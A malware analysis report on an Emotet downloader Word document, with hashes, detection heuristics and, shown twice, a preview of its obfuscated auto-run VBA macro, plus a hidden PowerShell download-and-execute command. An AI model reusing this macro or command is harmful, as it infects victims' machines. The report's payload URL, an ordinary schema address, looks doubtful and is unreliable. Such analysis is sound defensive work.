Emotet Office (OLE) malware analysis — malicious · f9ddb4d39c4d0369

MALICIOUS

Office (OLE)

264.2 KB Created: 2018-07-10 17:51:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 3b98d759b82dc49776ae5d61131eb1f2 SHA-1: 30eddb5ad70283d9333972cf4f87e0dbae8617c9 SHA-256: f9ddb4d39c4d0369bf6f08330d5cc799850c70b44bc8af436cddabf10f24e449

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This macro is designed to execute a PowerShell command, which is obfuscated but reconstructs to 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://schemas.openxmlformats.org/drawingml/2006/main')"'. This command downloads and executes a second-stage payload from the specified URL. The ClamAV detection name 'Doc.Downloader.Emotet-6877455-0' strongly suggests the Emotet family.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6877455-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877455-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19393 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19393 bytes
SHA-256: `277422a0b8e8d12ee201cf00b21d1a060871004271537dbe9feab39da3d2c928`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JVVdjZCANoknl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next kdBhcj = 12550 * zJhUfC / IXhkz - LLhBaB iDJBY = 35954 * jCiBR / JkUaao - bLbrk FBUIYfziYz ("" + zzAEcXv + IFEDDNMilo + SGRvO + srJFhZDMjz + QjtPp + prQQWtQtqD + bPTdEnJ) jnPOW = 59256 * fTRwHu / ITXqzY - kkrIn mwwNrw = 70180 * QXLtS / mmtcY - PUsHA sHKAzi = 44505 * SQQLzr / OkvBt - dXXkkM End Sub Attribute VB_Name = "SEqMGjASAIoO" Function SGRvO() On Error Resume Next mQkVw = 6213 * HETNTh - 23342 * WQwYa / ruwBkz / nAwuMw + 66315 / oKCffq * 39211 / EzCFlI / 731 - FSQuV / UMFFTD / TGldL ttuzX = tCirB + Ahpufn * BqpZa + QNksQ * abtVLY * XKsSi + 26373 * oDpiM lZLvm = "pow" + fQETUbGwJJRQb + MdVLQMJ + "ers" + MWhMYFfJ + vdQrErQOiIMz + "he" + wdAquZcWstHz + YDdIdpIcvlRUzz + "l" + zOuwPvEpO + YlXjGwWp + "l" + ETncUiOZaZi + vtDwddwouQi + " " + XCLVdIvktuHUv + PnojcIcqDBtMj + " ( " + DIrcKMOF + BsBwvciQIY + "NEW" + wIjvLHTkvOu + zcTCdBisKbPar + "-Ob" + KwYRDaJjtP + lLZmwSHw + "JeC" + NfWYkohTV + uZzqcfQ + "t" + anbvwjkoRHjKZ + sufqUCZuhGqm + " " + WnqGGoaDbbEDsC + pUdRzhzaUqAt + "s" + GtKruTsETHIoT + RJWjzRWJIzon + "YSt" QojJnV = (21333 - BItrlB + JIOvo * jiMzX / (jCrFfc + 35000 - 5108 - bfjja + (46062 - OmFjU / (75809 + rasbik)))) KdcNDqlYP = "e" + PlbqKCOO + DiciLOfYParrOw + "M." + fmAkSJH + zzhzMYrNW + "iO" + OshNCLttU + inJWbNijub + "." + NPwaDCAds + lmFnhGPNzsbU + "C" + pzdipqpFaTwDk + TudSAYkVaBZiN + "omP" + muEmOFXzDV + LmpdVZWjzzB + "r" + FbDdQLczB + wzblwva + "E" + sYikXDF + bosLXIdUVmK + "ss" + KFmfXzkkBXEp + sSGMFlUZsKma + "iO" KOjzvd = (32058 - ziidk + hVQnIV * BsIDll / (EbXnFh + 33706 - 40381 - GRqwzO + (98385 - BsBuB / (831 + iCsJWY)))) sfSYK = (81896 - CjMjJ + SWknt * CtjqDb / (EDpIwN + 21319 - 12949 - Sfpocd + (80872 - hSrQQ / (60739 + WdjtR)))) bZomi = (19014 - dwsfI + saQoW * bkBPZ / (jNkMb + 84843 - 94979 - cIbjSG + (25256 - PUOhw / (60225 + zbWQar)))) FQcjhQ = "N." + zalVMYNVw + DFzENYDPIl + "D" + oXhmViRppd + OqIdwUwsBvcCY + "E" + UNshdNGwzf + qjZiaoEqWQaSo + "FLA" + TtviNzIzbzwnf + KzKcFMbRBNUhzD + "TE" + soVnDCAYui + hiBZicGcILifrc + "st" + tQItoXDwJ + IwliXcdjXLuwX + "R" + RhGqvbIj + ZqJKaDPNlzf + "eAm" + LCOsVFwRlvc + rSZPAMGEzm + "([" + wIfklAfuDv + imijMovjEELw + "SYs" + zSQZNQuTYw + zuwLSwishNi + "Te" + IrnVswiwPDNii + mPNiNjoAjt + "M." + SvojkqhEZ + jAkjkrjjnOGGSA + "IO." + LUqDbFjQ + TdozdzfQjhd + "M" + IANzBLp + kdWkiEWbTTjK + "e" rqlHa = (TSjPP / COGiEL / 6578 / sKasQa + 89537 * OJNtk / 88668 * IQEOV * (SuHUA - HVoPX)) MmcdtMGkuv = "MoR" + jPsqAGODZ + zItzOzwhUa + "Y" + XQYmjZtpmv + tXOOPBOUFwDtO + "sTR" + PbZUmQwVabT + jMjBbFDqlhS + "E" + vOYNfYLz + NbtXzConv + "a" + osPBRJUjitGB + hwNvvTiBwV + "m]" + hGowuXwcGVJL + qPzTHZTCP + " [" + rADFmutbibO + wiFwOMnBhfcO + "S" + OAPfrjVDXsW + PkfncURVYUU + "yst" + RZKUaqk + aTvWMMvLMbu + "EM" + RBrzukJqju + RvsCSjiLkJMsF + ".c" + ZMHtsQt + cavAFouZ + "o" + uRCIuvLanIpz + jkdZAzXYnjar + "NvE" + GvOmoXNnWENw + FATdhJUULVYDK + "Rt]" + SiCKdTstCKW + NZLCTjSnQzKaO + ":" + tOkMrIDVKnDX + RSKkaGlJ + ":" DGtua = (JQwZa / SISjLa / 39561 / ZWmzm + 94609 * QbkjOr / 12846 * iYJOlv * (jSbLYo - Ywtzz)) dDrCls = (OiHzoZ / jkJDB / 28413 / JFjzi + 98770 * niwjsA / 67193 * RBkRDp * (FGcsBD - ziIHUU)) TvHdVt = (LtLBLK / KBLiEi / 79912 / WaZtA + 6403 * mPtVQL / 56861 * lPCCV * (PKMdb - uiQsC)) uJJsOQjXz = "fr" + hDcslWGwHq + hAZTCjUuHQN + "Om" + puEwBSZMEU + JRwSTDVkwjtIz + "b" + XFRRqNTvcC + YUQcjrj + "Ase" + VboMrfaJA + KvCHnCr + "6" + VVQVzwQiENQRw + ddEwism + "4" + wvcRJpd + CtAKSPv + "s" + FmfjMoBdJwsrz + KYBUwYPjPLvNA + "TR" + oDTzhpaN + QfffIOEKGAuOb + "iN" + pDPYQbAKzJ + zCEjKSjhsj + "G(" + wqDtSQac + rmKpTMQVjVT + "'" + HCRjvuib + IcZYGsjjMVRLRY + "VZB" + URXDjnFjvrAjih + lnCNtoK + "N" icUdWG = (FruLI / SonzdJ / 70480 / WXzLqG + 79816 * DULJM / 28125 * PPczk * (qNrsn - sDFim)) ... (truncated)

SHA-256: 277422a0b8e8d12ee201cf00b21d1a060871004271537dbe9feab39da3d2c928

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JVVdjZCANoknl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   kdBhcj = 12550 * zJhUfC / IXhkz - LLhBaB
   iDJBY = 35954 * jCiBR / JkUaao - bLbrk
FBUIYfziYz ("" + zzAEcXv + IFEDDNMilo + SGRvO + srJFhZDMjz + QjtPp + prQQWtQtqD + bPTdEnJ)
   jnPOW = 59256 * fTRwHu / ITXqzY - kkrIn
   mwwNrw = 70180 * QXLtS / mmtcY - PUsHA
   sHKAzi = 44505 * SQQLzr / OkvBt - dXXkkM
End Sub


Attribute VB_Name = "SEqMGjASAIoO"
Function SGRvO()
On Error Resume Next
mQkVw = 6213 * HETNTh - 23342 * WQwYa / ruwBkz / nAwuMw + 66315 / oKCffq * 39211 / EzCFlI / 731 - FSQuV / UMFFTD / TGldL
   ttuzX = tCirB + Ahpufn * BqpZa + QNksQ * abtVLY * XKsSi + 26373 * oDpiM
lZLvm = "pow" + fQETUbGwJJRQb + MdVLQMJ + "ers" + MWhMYFfJ + vdQrErQOiIMz + "he" + wdAquZcWstHz + YDdIdpIcvlRUzz + "l" + zOuwPvEpO + YlXjGwWp + "l" + ETncUiOZaZi + vtDwddwouQi + " " + XCLVdIvktuHUv + PnojcIcqDBtMj + " ( " + DIrcKMOF + BsBwvciQIY + "NEW" + wIjvLHTkvOu + zcTCdBisKbPar + "-Ob" + KwYRDaJjtP + lLZmwSHw + "JeC" + NfWYkohTV + uZzqcfQ + "t" + anbvwjkoRHjKZ + sufqUCZuhGqm + "  " + WnqGGoaDbbEDsC + pUdRzhzaUqAt + "s" + GtKruTsETHIoT + RJWjzRWJIzon + "YSt"
QojJnV = (21333 - BItrlB + JIOvo * jiMzX / (jCrFfc + 35000 - 5108 - bfjja + (46062 - OmFjU / (75809 + rasbik))))
KdcNDqlYP = "e" + PlbqKCOO + DiciLOfYParrOw + "M." + fmAkSJH + zzhzMYrNW + "iO" + OshNCLttU + inJWbNijub + "." + NPwaDCAds + lmFnhGPNzsbU + "C" + pzdipqpFaTwDk + TudSAYkVaBZiN + "omP" + muEmOFXzDV + LmpdVZWjzzB + "r" + FbDdQLczB + wzblwva + "E" + sYikXDF + bosLXIdUVmK + "ss" + KFmfXzkkBXEp + sSGMFlUZsKma + "iO"
KOjzvd = (32058 - ziidk + hVQnIV * BsIDll / (EbXnFh + 33706 - 40381 - GRqwzO + (98385 - BsBuB / (831 + iCsJWY))))
   sfSYK = (81896 - CjMjJ + SWknt * CtjqDb / (EDpIwN + 21319 - 12949 - Sfpocd + (80872 - hSrQQ / (60739 + WdjtR))))
   bZomi = (19014 - dwsfI + saQoW * bkBPZ / (jNkMb + 84843 - 94979 - cIbjSG + (25256 - PUOhw / (60225 + zbWQar))))
FQcjhQ = "N." + zalVMYNVw + DFzENYDPIl + "D" + oXhmViRppd + OqIdwUwsBvcCY + "E" + UNshdNGwzf + qjZiaoEqWQaSo + "FLA" + TtviNzIzbzwnf + KzKcFMbRBNUhzD + "TE" + soVnDCAYui + hiBZicGcILifrc + "st" + tQItoXDwJ + IwliXcdjXLuwX + "R" + RhGqvbIj + ZqJKaDPNlzf + "eAm" + LCOsVFwRlvc + rSZPAMGEzm + "([" + wIfklAfuDv + imijMovjEELw + "SYs" + zSQZNQuTYw + zuwLSwishNi + "Te" + IrnVswiwPDNii + mPNiNjoAjt + "M." + SvojkqhEZ + jAkjkrjjnOGGSA + "IO." + LUqDbFjQ + TdozdzfQjhd + "M" + IANzBLp + kdWkiEWbTTjK + "e"
rqlHa = (TSjPP / COGiEL / 6578 / sKasQa + 89537 * OJNtk / 88668 * IQEOV * (SuHUA - HVoPX))
MmcdtMGkuv = "MoR" + jPsqAGODZ + zItzOzwhUa + "Y" + XQYmjZtpmv + tXOOPBOUFwDtO + "sTR" + PbZUmQwVabT + jMjBbFDqlhS + "E" + vOYNfYLz + NbtXzConv + "a" + osPBRJUjitGB + hwNvvTiBwV + "m]" + hGowuXwcGVJL + qPzTHZTCP + " [" + rADFmutbibO + wiFwOMnBhfcO + "S" + OAPfrjVDXsW + PkfncURVYUU + "yst" + RZKUaqk + aTvWMMvLMbu + "EM" + RBrzukJqju + RvsCSjiLkJMsF + ".c" + ZMHtsQt + cavAFouZ + "o" + uRCIuvLanIpz + jkdZAzXYnjar + "NvE" + GvOmoXNnWENw + FATdhJUULVYDK + "Rt]" + SiCKdTstCKW + NZLCTjSnQzKaO + ":" + tOkMrIDVKnDX + RSKkaGlJ + ":"
DGtua = (JQwZa / SISjLa / 39561 / ZWmzm + 94609 * QbkjOr / 12846 * iYJOlv * (jSbLYo - Ywtzz))
   dDrCls = (OiHzoZ / jkJDB / 28413 / JFjzi + 98770 * niwjsA / 67193 * RBkRDp * (FGcsBD - ziIHUU))
   TvHdVt = (LtLBLK / KBLiEi / 79912 / WaZtA + 6403 * mPtVQL / 56861 * lPCCV * (PKMdb - uiQsC))
uJJsOQjXz = "fr" + hDcslWGwHq + hAZTCjUuHQN + "Om" + puEwBSZMEU + JRwSTDVkwjtIz + "b" + XFRRqNTvcC + YUQcjrj + "Ase" + VboMrfaJA + KvCHnCr + "6" + VVQVzwQiENQRw + ddEwism + "4" + wvcRJpd + CtAKSPv + "s" + FmfjMoBdJwsrz + KYBUwYPjPLvNA + "TR" + oDTzhpaN + QfffIOEKGAuOb + "iN" + pDPYQbAKzJ + zCEjKSjhsj + "G(" + wqDtSQac + rmKpTMQVjVT + "'" + HCRjvuib + IcZYGsjjMVRLRY + "VZB" + URXDjnFjvrAjih + lnCNtoK + "N"
icUdWG = (FruLI / SonzdJ / 70480 / WXzLqG + 79816 * DULJM / 28125 * PPczk * (qNrsn - sDFim))
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.